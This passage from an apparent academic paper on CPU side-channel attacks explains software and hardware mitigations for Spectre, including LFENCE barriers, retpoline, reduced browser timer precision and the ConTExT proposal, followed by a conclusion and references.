5.1.2 LFENCE LFENCE is an x86 instruction which blocks further execution until all preceding load operands have arrived. Inserting it serializes the program code at that point, but since speculative execution is a hardware feature, it cannot be prevented from happening in general, only stopped locally at such a fence.
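As a sketch of where such a fence could be placed, the following variant of the code from figure 4 uses the _mm_lfence intrinsic directly after the bounds check; the function and array names are the assumed ones from the earlier example:

#include <stddef.h>
#include <stdint.h>
#include <x86intrin.h>   /* _mm_lfence */

extern uint8_t array1[], array2[];
extern size_t  array1_size;

uint8_t victim_function_with_fence(size_t x) {
    uint8_t y = 0;
    if (x < array1_size) {
        _mm_lfence();   /* speculation barrier: the loads below only run
                           once the bounds check has actually resolved   */
        y = array2[array1[x] * 256];
    }
    return y;
}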

So it would only prevent Spectre V1 on conditional branches, but not Spectre V2 with branch poisoning. It also has several drawbacks: the first is that it really slows down execution and can therefore only be used at really critical instructions. With this it is in the hands of the programmer, who has to have a good understanding of speculative execution and has to carefully decide where to use it, and it is more than likely that a necessary fence is overlooked in certain circumstances.

So even though it is a good start for a mitigation, it does not fix the underlying problem.

5.1.3 Retpoline Retpoline is a technique developed by Google [9] against the poisoning of indirect branches, with the main idea that even though one cannot hinder the CPU from speculatively executing, one can trick it into the developer's own harmless speculative execution. The name is composed of ret(urn) and trampoline, which also describes the idea behind it: to trap the speculation of the return in an infinite loop until the required target address has arrived.

Since indirect calls and jumps are predicted by the CPU, the idea behind retpoline is to trap the branch predictor in always the same harmless code until the real target address has been computed.

³ But not its successors like LVI, as already stated

1 call set_up_target;   (1)
2 capture_spec:         (4)
3     pause;
4     jmp capture_spec;
5 set_up_target:
6     mov %r11, (%rsp);  (2)
7     ret;               (3)

Figure 12: Example x86 assembler which shows the implementation of retpoline

The implementation of retpoline can be seen in figure 12. The call to set_up_target (1) pushes the address corresponding to line 2 in the example onto the stack as the return address. set_up_target then overwrites this return address on the stack with the real jump target from %r11 (2). Since the CPU has to wait for the result of this memory access to arrive at the ret (3), it speculatively returns to the address it still predicts from the stack, and this is where the retpoline technique kicks in: the speculative execution is captured in the loop at (4), and when the real address finally arrives after a few hundred cycles, the speculation is discarded without having accessed any information.

Since the CPU naturally has to wait for the jump-target address to arrive from memory anyway, retpoline has essentially no performance impact. It merely disables the built-in prediction of indirect jumps to already-known targets, but this can be compensated by providing this information manually at compile time for known indirect branches.

5.1.4 Timer Inaccuracy in JavaScript Another viable approach to make side-channel attacks impossible is to artificially reduce the accuracy of timers. Such approaches do not work for every program, but especially in sandboxed environments like browsers this was a measure taken by all well-known browser manufacturers like Mozilla [20], Google [8] and Microsoft [19]. All of them made the high-precision timers in their browsers less accurate, so that even though the security hole is still present and one can still trick the CPU into wrong speculative execution, it is no longer possible to read out data between different tabs, at a cost that is negligible for most JavaScript used on websites.

5.2 Hardware Mitigations Since hardware mitigations require a long time to be tested and shipped before they can be applied, most patches until today were made either in software or in the microcode of processors. The development departments of well-known processor manufacturers did announce that several tweaks to their architectures were made to somehow mitigate the issues, but the details are most often not public.

Finally, in 2020, Schwarz et al. [23] developed a mixed hardware/software approach called ConTExT that requires only small tweaks in hardware, but also some new concepts in programming, while trying to mitigate the issue in general.

5.2.1 ConTExT As already stated, ConTExT (Considerate Transient Execution Technique) is a general approach to mitigate the whole Spectre family by moving the responsibility up to the highest level of software development: the actual code. It introduces a new non-transient bit for page tables and registers which indicates to the CPU that it should use a dummy value instead of the actual one during transient execution. This ensures that not only memory locations but also registers are protected against speculative attacks. All in all, ConTExT is an overall approach which affects every part of a computer system: the processor, which keeps track of the secrets; the operating system, which has to be aware of secrets in registers during context switches; the compiler, which maps the new secret annotations to machine instructions; and the actual code, which needs new annotations for secret values.

It makes the assumption that it is generally distinguishable whether a value is secret or not. This distinction has to be made by the programmer, who, for ConTExT, needs to annotate these values as secret. With this information the compiler can create an additional section in the resulting binary where secret values are stored. This section is backed by memory pages which have the non-transient bit set, and every value from it is tracked by the hardware while in use, by also storing this bit in the registers of the CPU. When such a value is needed in an execution and the CPU would have to speculate on it, it first checks the bit, and if it is set, the real value is not used for the speculative execution.

In the end, the authors claim that this approach has a performance impact of 0% up to 338% while fully mitigating all known Spectre attacks, and that it can even be easily adapted to every new variant that comes out.

6 Conclusion

With all this knowledge it is not hard to say that neither Spectre nor Meltdown is really a tamed ghost. Even though every actor involved is actively trying to fix the most urgent problems, there is, until today, no general approach commonly adopted in processors which fixes the problems of out-of-order and speculative execution. A real fix can only come with a thorough redesign of the processor architecture, as seen in section 5.2, and this requires all hardware to be exchanged, which will take a very long time to complete. Until then, the only viable alternative is to react proactively to new variants and try to fix them in software as much as possible. So this problem will bother us for a long time yet.

Furthermore, these attacks have made side-channel attacks in particular, but also hardware attacks in general, a really popular scientific field, and it is to be expected that these will have a much bigger impact for attackers in the future as they get more widely adopted and more researchers concentrate on this topic.

All discussions about mitigations for the attacks have a big focus on performance, which is understandable in an economic sense, since the performance benefit of speculative and out-of-order execution is too big to neglect. But since we are at a point where current processor architectures cannot keep up with Moore's law and making the structures ever smaller is coming to an end, it is necessary to switch to new architectural approaches to improve performance further. So it would be a good opportunity to take this chance and develop new architectures which are affected neither by Spectre nor by Meltdown.

In the future it will be much more important that hardware engineers do not only focus on performance at all costs, but shift their attention more to the security aspects of processors, to ensure that the data of a user is protected even in hostile environments where multiple users share a single physical machine, as with virtual machines and cloud computing.

References

[1] CLFLUSH Documentation. Available at https://www.felixcloutier.com/x86/clflush.
[2] AMD: AMD Ryzen Specification. Available at http://www.cpu-world.com/CPUs/Zen/AMD-Ryzen%209%203900.html.
[3] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin & Daniel Gruss: A Systematic Evaluation of Transient Execution Attacks and Defenses.
[4] Thomas Claburn: Foreshadow returns to the foreground: Secrets-spilling speculative-execution Intel flaw lives on, say boffins. Available at https://www.theregister.com/2020/08/07/foreshadow_strikes_back_boffins_find/.
[5] Ryan Crosby (2018): SpectrePoC. Available at https://github.com/crozone/SpectrePoC.
[6] Jeffrey Friedman (1972): Tempest: A signal problem. NSA Cryptologic Spectrum 35, p. 76.
[7] Ulf Frisk (2018): Total Meltdown? Available at http://blog.frizk.net/2018/03/total-meltdown.html.
[8] Google: Mitigating Side-Channel Attacks. Available at https://www.chromium.org/Home/chromium-security/ssca.
[9] Google: Retpoline. Available at https://support.google.com/faqs/answer/7625886.
[10] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice & Stefan Mangard (2017): KASLR is dead: long live KASLR. In: International Symposium on Engineering Secure Software and Systems, Springer, pp. 161–176.
[11] Daniel Gruss, Raphael Spreitzer & Stefan Mangard (2015): Cache template attacks: Automating attacks on inclusive last-level caches. In: 24th USENIX Security Symposium (USENIX Security 15), pp. 897–912.
[12] Heise (2018): CPU-Sicherheitslücken Spectre-NG: Updates und Info-Links. Available at https://www.heise.de/ct/artikel/CPU-Sicherheitsluecken-Spectre-NG-Updates-und-Info-Links-4053268.html.
[13] Y. Kim, R. Daly, J. Kim, C. Fallin, J. H. Lee, D. Lee, C. Wilkerson, K. Lai & O. Mutlu (2014): Flipping bits in memory without accessing them: An experimental study of DRAM disturbance errors. In: 2014 ACM/IEEE 41st International Symposium on Computer Architecture (ISCA), pp. 361–372.
[14] Olaf Kirch (2018): Meltdown and Spectre Performance. Available at https://www.suse.com/c/meltdown-spectre-performance/.
[15] Paul Kocher, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz & Yuval Yarom: Spectre Attacks: Exploiting Speculative Execution.
[16] Paul C. Kocher (1996): Timing attacks on implementations of Diffie-Hellman, RSA, DSS, and other systems. In: Advances in Cryptology (CRYPTO '96), pp. 104–113.
[17] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom & Mike Hamburg: Meltdown.
[18] F. Liu, Y. Yarom, Q. Ge, G. Heiser & R. B. Lee (2015): Last-Level Cache Side-Channel Attacks are Practical. In: 2015 IEEE Symposium on Security and Privacy, pp. 605–622, doi:10.1109/SP.2015.43.
[19] Microsoft: Mitigating speculative execution side-channel attacks in Microsoft Edge and Internet Explorer. Available at https://blogs.windows.com/msedgedev/2018/01/03/speculative-execution-mitigations-microsoft-edge-internet-explorer/.

[20] Mozilla: Mitigations landing for new class of timing attack. Available at https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/.
[21] Dag Arne Osvik, Adi Shamir & Eran Tromer (2006): Cache Attacks and Countermeasures: The Case of AES. In David Pointcheval, editor: Topics in Cryptology - CT-RSA 2006, Springer Berlin Heidelberg, Berlin, Heidelberg, pp. 1–20.
[22] Paul A. Grassi, Michael E. Garcia & James L. Fenton (2017): NIST Special Publication 800-63-3, Digital Identity Guidelines. National Institute of Standards and Technology, doi:10.6028/NIST.SP.800-63-3.
[23] Michael Schwarz, Moritz Lipp, Claudio Canella, Robert Schilling, Florian Kargl & Daniel Gruss (2020): ConTExT: A generic approach for mitigating Spectre. In: Proceedings of the 27th Annual Network and Distributed System Security Symposium (NDSS 2020), Internet Society, Reston, VA.
[24] Michael Schwarz, Martin Schwarzl, Moritz Lipp, Jon Masters & Daniel Gruss (2019): NetSpectre: Read arbitrary memory over network. In: European Symposium on Research in Computer Security, Springer, pp. 279–299.
[25] François-Xavier Standaert (2010): Introduction to side-channel attacks. In: Secure Integrated Circuits and Systems, Springer, pp. 27–42.
[26] Yukiyasu Tsunoo, Teruo Saito, Tomoyasu Suzaki, Maki Shigeri & Hiroshi Miyauchi (2003): Cryptanalysis of DES Implemented on Computers with Cache. In Colin D. Walter, Çetin K. Koç & Christof Paar, editors: Cryptographic Hardware and Embedded Systems - CHES 2003, Springer Berlin Heidelberg, Berlin, Heidelberg, pp. 62–76.
[27] Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark Silberstein, Thomas F. Wenisch, Yuval Yarom & Raoul Strackx (2018): Foreshadow: Extracting the keys to the Intel SGX kingdom with transient out-of-order execution. In: 27th USENIX Security Symposium (USENIX Security 18), pp. 991–1008.
[28] Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss & Frank Piessens (2020): LVI: Hijacking transient execution through microarchitectural load value injection. In: 2020 IEEE Symposium on Security and Privacy (SP), IEEE, pp. 54–72.
[29] Yuval Yarom & Katrina Falkner (2014): FLUSH+RELOAD: A high resolution, low noise, L3 cache side-channel attack. In: 23rd USENIX Security Symposium (USENIX Security 14), pp. 719–732.
